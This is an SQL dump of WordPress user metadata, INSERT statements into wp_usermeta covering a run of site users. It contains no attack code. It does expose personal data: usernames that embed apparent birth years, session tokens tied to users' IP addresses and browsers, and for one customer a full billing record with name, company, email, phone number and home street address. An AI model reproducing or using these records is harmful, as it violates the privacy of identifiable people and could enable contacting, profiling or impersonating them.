INSERT INTO `wp_usermeta` VALUES (24854, 1706, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24855, 1706, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24856, 1706, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24857, 1706, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24858, 1706, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24859, 1706, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24860, 1706, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24861, 1706, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24862, 1706, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24863, 1706, '_yoast_wpseo_profile_updated', '1499975269'); 
INSERT INTO `wp_usermeta` VALUES (24864, 1706, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24865, 1707, 'nickname', 'Justin.Cullen'); 
INSERT INTO `wp_usermeta` VALUES (24866, 1707, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24867, 1707, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24868, 1707, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24869, 1707, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24870, 1707, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24871, 1707, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24872, 1707, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24873, 1707, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24874, 1707, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24875, 1707, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24876, 1707, '_yoast_wpseo_profile_updated', '1499980427'); 
INSERT INTO `wp_usermeta` VALUES (24877, 1707, 'session_tokens', 'a:1:{s:64:"a775b95c20faa1f9223599a3e6a4d3ea7bf4b4d716c983680ac2baaee2c8ef69";a:4:{s:10:"expiration";i:1501190035;s:2:"ip";s:12:"66.150.8.161";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499980435;}}'); 
INSERT INTO `wp_usermeta` VALUES (24878, 1707, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (24879, 1708, 'nickname', 'shawnchalifoux2002'); 
INSERT INTO `wp_usermeta` VALUES (24880, 1708, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24881, 1708, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24882, 1708, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24883, 1708, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24884, 1708, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24885, 1708, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24886, 1708, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24887, 1708, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24888, 1708, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24889, 1708, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24890, 1708, '_yoast_wpseo_profile_updated', '1499983944'); 
INSERT INTO `wp_usermeta` VALUES (24891, 1708, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24892, 1709, 'nickname', 'prism16031996'); 
INSERT INTO `wp_usermeta` VALUES (24893, 1709, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24894, 1709, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24895, 1709, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24896, 1709, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24897, 1709, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24898, 1709, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24899, 1709, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24900, 1709, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24901, 1709, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24902, 1709, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24903, 1709, '_yoast_wpseo_profile_updated', '1499984752'); 
INSERT INTO `wp_usermeta` VALUES (24904, 1709, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24905, 1710, 'nickname', 'kathrynannekerner1995'); 
INSERT INTO `wp_usermeta` VALUES (24906, 1710, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24907, 1710, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24908, 1710, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24909, 1710, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24910, 1710, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24911, 1710, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24912, 1710, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24913, 1710, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24914, 1710, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24915, 1710, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24916, 1710, '_yoast_wpseo_profile_updated', '1499988415'); 
INSERT INTO `wp_usermeta` VALUES (24917, 1710, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24918, 1711, 'nickname', 'ho3wi1977'); 
INSERT INTO `wp_usermeta` VALUES (24919, 1711, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24920, 1711, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24921, 1711, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24922, 1711, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24923, 1711, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24924, 1711, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24925, 1711, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24926, 1711, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24927, 1711, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24928, 1711, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24929, 1711, '_yoast_wpseo_profile_updated', '1499991431'); 
INSERT INTO `wp_usermeta` VALUES (24930, 1711, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24931, 1712, 'nickname', 'ccwils1972'); 
INSERT INTO `wp_usermeta` VALUES (24932, 1712, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24933, 1712, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24934, 1712, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24935, 1712, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24936, 1712, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24937, 1712, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24938, 1712, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24939, 1712, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24940, 1712, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24941, 1712, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24942, 1712, '_yoast_wpseo_profile_updated', '1499993532'); 
INSERT INTO `wp_usermeta` VALUES (24943, 1712, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24944, 1713, 'nickname', 'dreamnajee1971'); 
INSERT INTO `wp_usermeta` VALUES (24945, 1713, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24946, 1713, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24947, 1713, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24948, 1713, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24949, 1713, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24950, 1713, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24951, 1713, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24952, 1713, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24953, 1713, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24954, 1713, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24955, 1713, '_yoast_wpseo_profile_updated', '1500001278'); 
INSERT INTO `wp_usermeta` VALUES (24956, 1713, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24957, 1714, 'nickname', 'Lindman'); 
INSERT INTO `wp_usermeta` VALUES (24958, 1714, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24959, 1714, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24960, 1714, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24961, 1714, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24962, 1714, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24963, 1714, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24964, 1714, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24965, 1714, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24966, 1714, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24967, 1714, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24968, 1714, '_yoast_wpseo_profile_updated', '1500003181'); 
INSERT INTO `wp_usermeta` VALUES (24969, 1714, 'session_tokens', 'a:1:{s:64:"aaa4299e1d46557f134f30fc8dd501ff6ec5c5e3a37cb59b41dfaebf0e83e507";a:4:{s:10:"expiration";i:1501212790;s:2:"ip";s:14:"24.251.149.235";s:2:"ua";s:135:"Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1";s:5:"login";i:1500003190;}}'); 
INSERT INTO `wp_usermeta` VALUES (24970, 1714, 'billing_first_name', 'Gerald'); 
INSERT INTO `wp_usermeta` VALUES (24971, 1714, 'billing_last_name', 'Lindman'); 
INSERT INTO `wp_usermeta` VALUES (24972, 1714, 'billing_company', 'Clinical Technologies'); 
INSERT INTO `wp_usermeta` VALUES (24973, 1714, 'billing_email', 'lindman@aol.com'); 
INSERT INTO `wp_usermeta` VALUES (24974, 1714, 'billing_phone', '6025492009'); 
INSERT INTO `wp_usermeta` VALUES (24975, 1714, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (24976, 1714, 'billing_address_1', '11391 East Jenan Drive'); 
INSERT INTO `wp_usermeta` VALUES (24977, 1714, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (24978, 1714, 'billing_city', 'Scottsdale'); 
INSERT INTO `wp_usermeta` VALUES (24979, 1714, 'billing_state', 'AZ'); 
INSERT INTO `wp_usermeta` VALUES (24980, 1714, 'billing_postcode', '85259'); 
INSERT INTO `wp_usermeta` VALUES (24981, 1715, 'nickname', 'barbaraj.rushlow1973'); 
INSERT INTO `wp_usermeta` VALUES (24982, 1715, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24983, 1715, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24984, 1715, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24985, 1715, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24986, 1715, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (24987, 1715, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (24988, 1715, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (24989, 1715, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24990, 1715, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (24991, 1715, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (24992, 1715, '_yoast_wpseo_profile_updated', '1500007741'); 
INSERT INTO `wp_usermeta` VALUES (24993, 1715, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (24994, 1716, 'nickname', 'ringoscarr1958'); 
INSERT INTO `wp_usermeta` VALUES (24995, 1716, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24996, 1716, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (24997, 1716, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (24998, 1716, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (24999, 1716, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25000, 1716, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25001, 1716, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25002, 1716, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25003, 1716, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25004, 1716, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25005, 1716, '_yoast_wpseo_profile_updated', '1500010652'); 
INSERT INTO `wp_usermeta` VALUES (25006, 1716, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25007, 1717, 'nickname', 'fanwei'); 
INSERT INTO `wp_usermeta` VALUES (25008, 1717, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25009, 1717, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25010, 1717, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25011, 1717, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25012, 1717, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25013, 1717, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25014, 1717, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25015, 1717, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25016, 1717, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25017, 1717, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25018, 1717, '_yoast_wpseo_profile_updated', '1500018290'); 
INSERT INTO `wp_usermeta` VALUES (25019, 1717, 'session_tokens', 'a:1:{s:64:"0c1d00261fd4ef2f49826d577cf6fb2bbb063e789199c166fa38f811f5c452e5";a:4:{s:10:"expiration";i:1501227901;s:2:"ip";s:14:"222.178.230.92";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";s:5:"login";i:1500018301;}}'); 
INSERT INTO `wp_usermeta` VALUES (25020, 1718, 'nickname', 'maryharlie2008'); 
INSERT INTO `wp_usermeta` VALUES (25021, 1718, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25022, 1718, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25023, 1718, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25024, 1718, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25025, 1718, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25026, 1718, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25027, 1718, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25028, 1718, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25029, 1718, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25030, 1718, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25031, 1718, '_yoast_wpseo_profile_updated', '1500018813'); 
INSERT INTO `wp_usermeta` VALUES (25032, 1718, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25033, 1719, 'nickname', 'rrs10191998'); 
INSERT INTO `wp_usermeta` VALUES (25034, 1719, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25035, 1719, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25036, 1719, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25037, 1719, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25038, 1719, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25039, 1719, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25040, 1719, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25041, 1719, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25042, 1719, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25043, 1719, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25044, 1719, '_yoast_wpseo_profile_updated', '1500023451'); 
INSERT INTO `wp_usermeta` VALUES (25045, 1719, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25046, 1720, 'nickname', 'mark_p_hanman2001'); 
INSERT INTO `wp_usermeta` VALUES (25047, 1720, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25048, 1720, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25049, 1720, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25050, 1720, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25051, 1720, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25052, 1720, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25053, 1720, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25054, 1720, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25055, 1720, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25056, 1720, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25057, 1720, '_yoast_wpseo_profile_updated', '1500027497'); 
INSERT INTO `wp_usermeta` VALUES (25058, 1720, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25059, 1721, 'nickname', 'dellingwood'); 
INSERT INTO `wp_usermeta` VALUES (25060, 1721, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25061, 1721, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25062, 1721, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25063, 1721, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25064, 1721, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25065, 1721, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25066, 1721, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25067, 1721, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25068, 1721, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25069, 1721, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25070, 1721, '_yoast_wpseo_profile_updated', '1500038557'); 
INSERT INTO `wp_usermeta` VALUES (25071, 1721, 'session_tokens', 'a:1:{s:64:"01f831a00e4c3ab9507c8e2fe02be444813a41046e242e03063d09db6e4ba6ee";a:4:{s:10:"expiration";i:1501248165;s:2:"ip";s:12:"74.95.111.20";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500038565;}}'); 
INSERT INTO `wp_usermeta` VALUES (25072, 1722, 'nickname', 'mark.smith'); 
INSERT INTO `wp_usermeta` VALUES (25073, 1722, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25074, 1722, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25075, 1722, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25076, 1722, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25077, 1722, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25078, 1722, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25079, 1722, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25080, 1722, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25081, 1722, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25082, 1722, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25083, 1722, '_yoast_wpseo_profile_updated', '1500040450'); 
INSERT INTO `wp_usermeta` VALUES (25084, 1722, 'session_tokens', 'a:1:{s:64:"1c2d05efe211a6e98bd2a3f34c24fb0ab5a509bfc90e31df067916792a3ce5d0";a:4:{s:10:"expiration";i:1502304942;s:2:"ip";s:13:"216.68.73.171";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502132142;}}'); 
INSERT INTO `wp_usermeta` VALUES (25085, 1723, 'nickname', 'saeed10081954'); 
INSERT INTO `wp_usermeta` VALUES (25086, 1723, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25087, 1723, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25088, 1723, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25089, 1723, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25090, 1723, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25091, 1723, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25092, 1723, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25093, 1723, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25094, 1723, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25095, 1723, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25096, 1723, '_yoast_wpseo_profile_updated', '1500051378'); 
INSERT INTO `wp_usermeta` VALUES (25097, 1723, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25098, 1724, 'nickname', 'annerb261992'); 
INSERT INTO `wp_usermeta` VALUES (25099, 1724, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25100, 1724, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25101, 1724, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25102, 1724, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25103, 1724, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25104, 1724, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25105, 1724, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25106, 1724, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25107, 1724, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25108, 1724, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25109, 1724, '_yoast_wpseo_profile_updated', '1500052748'); 
INSERT INTO `wp_usermeta` VALUES (25110, 1724, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25111, 1725, 'nickname', 'c632d1976'); 
INSERT INTO `wp_usermeta` VALUES (25112, 1725, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25113, 1725, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25114, 1725, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25115, 1725, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25116, 1725, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25117, 1725, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25118, 1725, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25119, 1725, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25120, 1725, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25121, 1725, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25122, 1725, '_yoast_wpseo_profile_updated', '1500075269'); 
INSERT INTO `wp_usermeta` VALUES (25123, 1725, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25124, 1726, 'nickname', 'mona.safabakhsh1989'); 
INSERT INTO `wp_usermeta` VALUES (25125, 1726, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25126, 1726, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25127, 1726, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25128, 1726, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25129, 1726, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25130, 1726, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25131, 1726, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25132, 1726, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25133, 1726, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25134, 1726, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25135, 1726, '_yoast_wpseo_profile_updated', '1500077616'); 
INSERT INTO `wp_usermeta` VALUES (25136, 1726, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25137, 1727, 'nickname', 'ruggere2000'); 
INSERT INTO `wp_usermeta` VALUES (25138, 1727, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25139, 1727, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25140, 1727, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25141, 1727, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25142, 1727, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25143, 1727, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25144, 1727, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25145, 1727, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25146, 1727, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25147, 1727, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25148, 1727, '_yoast_wpseo_profile_updated', '1500078488'); 
INSERT INTO `wp_usermeta` VALUES (25149, 1727, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25150, 1728, 'nickname', 'cbencomo11969'); 
INSERT INTO `wp_usermeta` VALUES (25151, 1728, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25152, 1728, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25153, 1728, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25154, 1728, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25155, 1728, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25156, 1728, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25157, 1728, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25158, 1728, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25159, 1728, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25160, 1728, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25161, 1728, '_yoast_wpseo_profile_updated', '1500080181'); 
INSERT INTO `wp_usermeta` VALUES (25162, 1728, 'default_password_nag', '1'); 
